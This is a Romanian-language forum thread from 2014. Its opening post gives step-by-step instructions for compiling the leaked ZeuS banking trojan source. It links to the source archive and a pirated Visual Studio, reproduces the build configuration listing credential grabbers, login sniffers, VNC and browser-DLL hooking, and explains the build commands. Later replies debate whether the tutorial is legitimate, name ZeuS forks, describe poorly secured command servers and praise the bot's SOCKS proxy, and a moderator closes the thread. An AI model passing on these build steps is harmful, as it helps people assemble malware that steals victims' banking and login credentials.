Ganav Posted July 1, 2014 Report Share Posted July 1, 2014 Acest tutorial va descrie un mod de compilare al cunosctutului bot Zeus. Sursele pot fi gasite aici:Zippyshare.com - ZeuS_2.0.8.9-Source.7zIn continuare vom avea nevoie de visual studio 2010 ultimate care se gaseste aici:https://thepiratebay.se/torrent/5606600/Visual_Studio_2010_Ultimate_%5BLatest%5D_%5B2010%5D_-_%5BGuruFuel%5DDupa dezarhivare, navigam in directorul /make/. Deschidem fisierul buildconfig.inc.php. Are o structura asemanatoare cu:<?php///////////////////////////////////////////////////////////////////////////////////////////////////// Êîíôèãóðàöèÿ.///////////////////////////////////////////////////////////////////////////////////////////////////$configDir = NULL;$config = array( 'debug' => -1, //Äîáàâëåíèå îòëàäî÷íîé èíôîðìàöèè. 'manual' => -1, //ßçûê äîêóìåíòàöèè. 'nspr4' => -1, //Ïåðåõâàò nspr4.dll 'wininet' => -1, //Ïåðåõâàò wininet.dll 'software_ftp' => -1, //Ãðàááåð FTP-êëèåíòîâ. 'software_email' => -1, //Ñáîð email'îâ ñ ïðîãðàìì. 'socket_ftp' => -1, //Ñíèôåð ëîãèíîâ FTP. 'socket_pop3' => -1, //Ñíèôåð ëîãèíîâ POP3. 'vnc' => -1, //VNC. 'jabber_notifier' => -1, //Íîòèôèêàòîð äëÿ Jabber. 'client_platforms' => -1, //Ñïèñîê ïëàòôîðì äëÿ client. 'server_platforms' => -1, //Ñïèñîê ïëàòôîðì äëÿ server. 'bcserver_platforms' => -1, //Ñïèñîê ïëàòôîðì äëÿ bcserver. 'builder_platforms' => -1, //Ñïèñîê ïëàòôîðì äëÿ builder. 'buildtools_platforms' => -1, //Ñïèñîê ïëàòôîðì äëÿ buildtools.);loadGlobalConfig();define('BO_NAME', 'ZeuS'); //Èìÿdefine('BO_CLIENT_VERSION', trim($config['global']['versions']['client'])); //Òåêóùàÿ âåðñèÿdefine('BO_BUILDTIME', gmdate('H:i:s d.m.Y', time()).' GMT'); //Âðåìÿ ñáîðêè//Äèðåêòîðèè êîìïèëÿòîðà.$dir['vcdlls'] = 'C:\Program Files\Microsoft Visual Studio 10.0\Common7\IDE';$dir['vc'] = 'C:\Program Files\Microsoft Visual Studio 10.0\VC';$dir['sdk'] = 'C:\Program Files\Microsoft SDKs\Windows\v7.0A';$dir['vcbin']['win32'] = $dir['vc'].'\bin';$dir['vcbin']['win64'] = $dir['vc'].'\bin\amd64';$dir['sdkbin']['win32'] = $dir['sdk'].'\bin';$dir['sdkbin']['win64'] = $dir['sdk'].'\bin\x64';Acum instalam visual studio 2010. Daca o instalare precedenta exista trebuie sa editam liniile urmatoare:$dir['vcdlls'] = 'C:\Program Files\Microsoft Visual Studio 10.0\Common7\IDE';$dir['vc'] = 'C:\Program Files\Microsoft Visual Studio 10.0\VC';$dir['sdk'] = 'C:\Program Files\Microsoft SDKs\Windows\v7.0A';astfel incat path-urile sa coincida cu cele alese la instalare. Path-urile de mai sus sunt create folosind setarile default la instalare.Putem compila aplicatia in doua moduri:Folosind fisierul .sln : il deschidem cu visual studio dupa care realizam un Build Solution (F7)Putem compila Zeus si din linia de comanda. Deschidem un cmd.exe, navigam in directorul in care am dezarhivat sursele si executam make_full.bat Inainte de compilare trebuie sa inlocuim doua executabile din directorul /bin/, din arhiva, si anume upx.exe si 7z.exe.Le descarcam de aici:upxUPX: the Ultimate Packer for eXecutables - Homepage7z:DownloadDupa inlocuirea acestora putem compila fie din visual studio(cu F7), fie din linia de comanda(dintr-un command prompt rulam make_full.bat) Link to comment Share on other sites More sharing options...
Cryo Posted July 1, 2014 Report Share Posted July 1, 2014 Troianul asta nu era specializat pe frauda bancara? (banklogins/etc) ... sigur ai voie cu asa ceva pe-aici? Link to comment Share on other sites More sharing options...
Ganav Posted July 1, 2014 Author Report Share Posted July 1, 2014 I-a cam trecut vremea, este detectat de majoritatea AV-urilor. Acum este folosit mai mult in scopuri educationale si ca si o sursa de inspiratie pentru dezvoltarea unor strategii de prevenire. Link to comment Share on other sites More sharing options...
Cryo Posted July 1, 2014 Report Share Posted July 1, 2014 Inca mai exista cryptere/etc, codul poate fi extins/obfuscat/modificat, si e proiectat si e capabil sa faca aceleasi lucruri ca si inainte, si nu e ca si cum nu sunt multi utilizatori cu AV incapabil...Si asta cu scopurile "educationale" e .... cum sa zic ... piper in ochi .Inca e cam "gri" situatia. Link to comment Share on other sites More sharing options...
Ganav Posted July 1, 2014 Author Report Share Posted July 1, 2014 Nu este singura aplicatie de acest tip. Daca poti modifica sursele astfel incat sa obtii functionalitatea sa originala atunci detii cunostiintele necesare sa scrii un alt bot similar de la zero. Link to comment Share on other sites More sharing options...
Byte-ul Posted July 1, 2014 Report Share Posted July 1, 2014 Nu este singura aplicatie de acest tip. Daca poti modifica sursele astfel incat sa obtii functionalitatea sa originala atunci detii cunostiintele necesare sa scrii un alt bot similar de la zero.Ce poti invata (doar ai zis cu scop educational) daca compilezi chestia asta?Ce sursa de inspiratie este compilarea botului asta creat pentru frauda bancara? Link to comment Share on other sites More sharing options...
Ganav Posted July 1, 2014 Author Report Share Posted July 1, 2014 Bot-ul nu mai functioneaza, nu mai poti fura nimic cu el, insa avand sursele la dispozitie iti poti da seama de modul in care gandeste cel care l-a scris. Link to comment Share on other sites More sharing options...
Azraell Posted July 1, 2014 Report Share Posted July 1, 2014 (edited) Defapt @Ganav are dreptate, poti invata cum functioneaza cu exactitate acest Trojan, te infectezi pe tine intr-un virtualbox si analizez conexiunile TCP/UDP si cum se trimit si primesc pachetele Edited July 1, 2014 by Azraell Link to comment Share on other sites More sharing options...
Ganav Posted July 1, 2014 Author Report Share Posted July 1, 2014 Cunosc bine regulile forumului. Nu voi posta niciodata material care incurajeaza, faciliteaza sau permite obtinerea de informatii bancare. Link to comment Share on other sites More sharing options...
Kotzu Posted July 1, 2014 Report Share Posted July 1, 2014 cine i-a luat locul lui Zeus acum? stiu ca-l cumparase spy-eye. Link to comment Share on other sites More sharing options...
mrtornado Posted July 1, 2014 Report Share Posted July 1, 2014 ce draqu tot aberati atat zeus e public source de nu stiu cati ani. bun tutorial Ganav Link to comment Share on other sites More sharing options...
malsploit Posted July 1, 2014 Report Share Posted July 1, 2014 Zeus inca mai este folosit. Codul a suferit modificari de-a lungul timpului. A fost implementat protocolul p2p, fisierul de configurare a fost ascuns in imagini, folosindu-se steganografia etc. In momentul in care codul sursa a fost facut public, au aparut "fork-uri". Cele mai cunoscute ar fi spyeye, citadel, kins etc. Citadel nu a fost initial folosit pentru furtul de date bancare. Se folosea mai mult pentru spionaj informatic. Era folosit in zone restranse. Link to comment Share on other sites More sharing options...
mrtornado Posted July 1, 2014 Report Share Posted July 1, 2014 cine stie castiga perfecta explicatie hate.me mie imi era lene sa scriu Link to comment Share on other sites More sharing options...
malsploit Posted July 1, 2014 Report Share Posted July 1, 2014 (edited) Chestia e ca foarte multi "copii" s-au reprofilat si au inceput sa foloseasca astfel de virusi. Neavand nici un fel de experienta fac tot felul de porcarii si multi sunt prinsi. Astfel se abate atentia de la "rechini". Multi sunt ocupati cu astia micii, in timp ce "cei care stiu" isi vad de treaba lor. Poate de-aia au si fost facute publice sursele de la zeus, carberp Am intalnit servere de comanda urcate pe site-uri sparte, care inca mai erau vulnerabile. Multi lasa phpmyadmin fara parola sau permit accesul la directorul /install/. In momentul in care accesam acest director, apar informatii pretioase despre serverul de comanda precum baza de date, directorul de reports, utilizatorul bazei de date etc. Citadel genereaza niste fisiere text pe care le pune intr-un director. In aceste fisiere se gasesc informatii despre sistemele infectate: date de autentificare http/ftp/smtp/ssh, adrese de e-mail, adrese ip etc Edited July 1, 2014 by hate.me Link to comment Share on other sites More sharing options...
io.kent Posted July 1, 2014 Report Share Posted July 1, 2014 Daca tot se vorbeste de Zeus, am auzit pe mai multe forumuri rusesti private ca Zeus a fost facut de badboy, numele adevarat Alexéi Belán! Link to comment Share on other sites More sharing options...
starlin1337 Posted July 2, 2014 Report Share Posted July 2, 2014 Dar zeus-botnet ce mai fura inafara de date bancare? Link to comment Share on other sites More sharing options...
Elohim Posted July 2, 2014 Report Share Posted July 2, 2014 Dar zeus-botnet ce mai fura inafara de date bancare?Incearca sa te abtii la posturi de genul asta. E deajuns ca produci numai gunoi pe forum, macar ai bunul simt si abtine-te in unele locuri.On: Daca cineva e interesat de asta, functia pentru socks este impecabila. Duce chiar si 300-400 de conexiuni paralele fara sa faca figuri. Sau tinea cel putin. Link to comment Share on other sites More sharing options...
malsploit Posted July 2, 2014 Report Share Posted July 2, 2014 (edited) Dar zeus-botnet ce mai fura inafara de date bancare?E un subiect destul de sensibil si dicutia trebuie pastrata la un nivel educativ/informativ. Poti sa intrebi de functii, de implementari etc. Deocamdata inchidem threadul. Daca mai are cineva intrebari pertinente, poate trimite un mesaj privat si il redeschidem.sugestie de la @yo20063Pentru cei care inca se gandesc sa-l foloseasca: in cazul in care apareti pe "hall of fame", iese destul de urat pentru voi:https://zeustracker.abuse.ch/monitor.phphttp://cybercrime-tracker.net/http://cybercrime-tracker.net/zbox.php Edited July 2, 2014 by hate.me 1 Link to comment Share on other sites More sharing options...
